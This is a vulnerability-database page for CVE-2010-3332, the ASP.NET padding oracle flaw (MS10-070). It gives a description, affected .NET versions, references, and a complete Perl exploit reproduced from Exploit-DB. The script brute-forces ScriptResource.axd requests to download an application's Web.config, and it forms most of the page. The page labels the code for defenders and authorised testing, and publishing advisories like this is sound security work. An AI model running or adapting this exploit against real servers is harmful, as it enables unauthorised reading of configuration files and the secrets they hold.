CVE-2010-3332
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
7.4
Description
Microsoft .NET Framework 1.1 SP1, 2.0 SP1 and SP2, 3.5, 3.5 SP1, 3.5.1, and 4.0, as used for ASP.NET in Microsoft Internet Information Services (IIS), provides detailed error codes during decryption attempts, which allows remote attackers to decrypt and modify encrypted View State (aka __VIEWSTATE) form data, and possibly forge cookies or read application files, via a padding oracle attack, aka "ASP.NET Padding Oracle Vulnerability."
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Microsoft ASP.NET - Padding Oracle (MS10-070)
# Source: http://blog.mindedsecurity.com/2010/10/breaking-net-encryption-with-or-without.html
#!/usr/bin/perl
#
#
# Webconfig Bruter - exploit tool for downloading Web.config
#
# FOr use this script you need Pudbuster.
# Padbuster is a great tool and Brian Holyfield deserve all the credits.
# Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2.
# A similar exploitation vector was also added lately in Padbuster v0.3:
# http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15213.pl (padBuster.pl)
#
#
# Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)
#
use LWP::UserAgent;
use strict;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;
#Definition of vars for .NET
my $toEncodeDecode;
my $b64Encoded;
my $string;
my $returnVal;
my $testUrl;
my $testBytes;
my $sampleBytes;
my $testUrl = @ARGV[0]."\?d\=";
my $sampleBytes = @ARGV[1];
my $blockSize = @ARGV[2];
if ($#ARGV < 2) {
die "
Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize
Where: URL = The target URL (and query string if applicable)
EncryptedSample = The encrypted value you want to use.
This need to come from Padbuster.
BlockSize = The block size being used by the algorithm (8 or 16)
Poc code by giorgio.fedon\@mindedsecurity.com
Original Padbuster code from Brian Holyfield - Gotham Digital Science
Command Example:
./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16
";}
my $method = "GET";
$sampleBytes = encoder($sampleBytes, 1);
my $testBytes = "\x00" x $blockSize;
my $counter = 0;
# Use random bytes
my @nums = (0..255);
my $status = 1;
while ($status)
{
# Fuzz the test bytes
for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--)
{
substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)]));
}
# Combine the test bytes and the sample
my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0);
chomp($combinedTestBytes);
$combinedTestBytes =~ s/\%0A//g;
# Ok, now make the request
my ($status, $content, $location, $contentLength) = makeRequest($method, $testUrl.$combinedTestBytes);
if ($status == "200")
{
# Remove this for "T" exploit
if (index($content,"parent\.Sys\.Application") == -1)
{
print $content."\n\n";
print "Total Requests:".$counter."\n\n";
print "Resulting Exploit Block:".$combinedTestBytes."\n\n";
last;
}
}
$counter++;
}
# The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science
#
# I also did the encoder / decoder, but your logic is definitely better
sub encoder
{
my ($toEncodeDecode, $oper) = @_;
# UrlDecoder Encoder
if ($oper == 1)
{
$toEncodeDecode =~ s/\-/\+/g;
$toEncodeDecode =~ s/\_/\//g;
my $count = chop($toEncodeDecode);
$toEncodeDecode = $toEncodeDecode.("=" x int($count));
$returnVal = decode_base64($toEncodeDecode);
}
else
{
$b64Encoded = encode_base64($toEncodeDecode);
$b64Encoded =~ s/(\r|\n)//g;
$b64Encoded =~ s/\+/\-/g;
$b64Encoded =~ s/\//\_/g;
my $count = $b64Encoded =~ s/\=//g;
($count eq "") ? ($count = 0) : "";
$returnVal = $b64Encoded.$count;
}
return $returnVal;
}
sub makeRequest {
my ($method, $url) = @_;
my ($lwp, $status, $content, $req, $location, $contentLength);
# Setup LWP UserAgent
$lwp = LWP::UserAgent->new(env_proxy => 1,
keep_alive => 1,
timeout => 30,
requests_redirectable => [],
);
$req = new HTTP::Request $method => $url;
my $response = $lwp->request($req);
# Extract the required attributes from the response
$status = substr($response->status_line, 0, 3);
$content = $response->content;
#print $content;
$location = $response->header("Location");
if ($location eq "")
{
$location = "N/A";
}
$contentLength = $response->header("Content-Length");
return ($status, $content, $location, $contentLength);
}Microsoft ASP.NET - Auto-Decryptor File Download (MS10-070)
Source code queued for fetch โ refresh in a moment.
Microsoft ASP.NET - Padding Oracle File Download (MS10-070)
Source code queued for fetch โ refresh in a moment.
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| microsoft | .net_framework | 1.1 | |
| microsoft | .net_framework | 2.0 | |
| microsoft | .net_framework | 3.5 | |
| microsoft | .net_framework | 3.5.1 | |
| microsoft | .net_framework | 4.0 | |
| microsoft | internet_information_services | - | |
References
- http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx
- http://isc.sans.edu/diary.html?storyid=9568
- http://pentonizer.com/general-programming/aspnet-poet-vulnerability-what-else-can-i-do/
- http://secunia.com/advisories/41409
- http://securitytracker.com/id?1024459
- http://threatpost.com/en_us/blogs/new-crypto-attack-affects-millions-aspnet-apps-091310
- http://twitter.com/thaidn/statuses/24832350146
- http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
- http://www.dotnetnuke.com/Community/Blogs/tabid/825/EntryId/2799/Oracle-Padding-Vulnerability-in-ASP-NET.aspx
- http://www.ekoparty.org/juliano-rizzo-2010.php
- http://www.microsoft.com/technet/security/advisory/2416728.mspx
- http://www.mono-project.com/Vulnerabilities#ASP.NET_Padding_Oracle
- http://www.securityfocus.com/bid/43316
- http://www.theinquirer.net/inquirer/news/1732956/security-researchers-destroy-microsoft-aspnet-security
- http://www.troyhunt.com/2010/09/fear-uncertainty-and-and-padding-oracle.html
- http://www.vupen.com/english/advisories/2010/2429
- http://www.vupen.com/english/advisories/2010/2751
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-070
- https://exchange.xforce.ibmcloud.com/vulnerabilities/61898
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12365
- http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx
- http://isc.sans.edu/diary.html?storyid=9568
- http://pentonizer.com/general-programming/aspnet-poet-vulnerability-what-else-can-i-do/
- http://secunia.com/advisories/41409
- http://securitytracker.com/id?1024459
CWEs
CWE-209
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.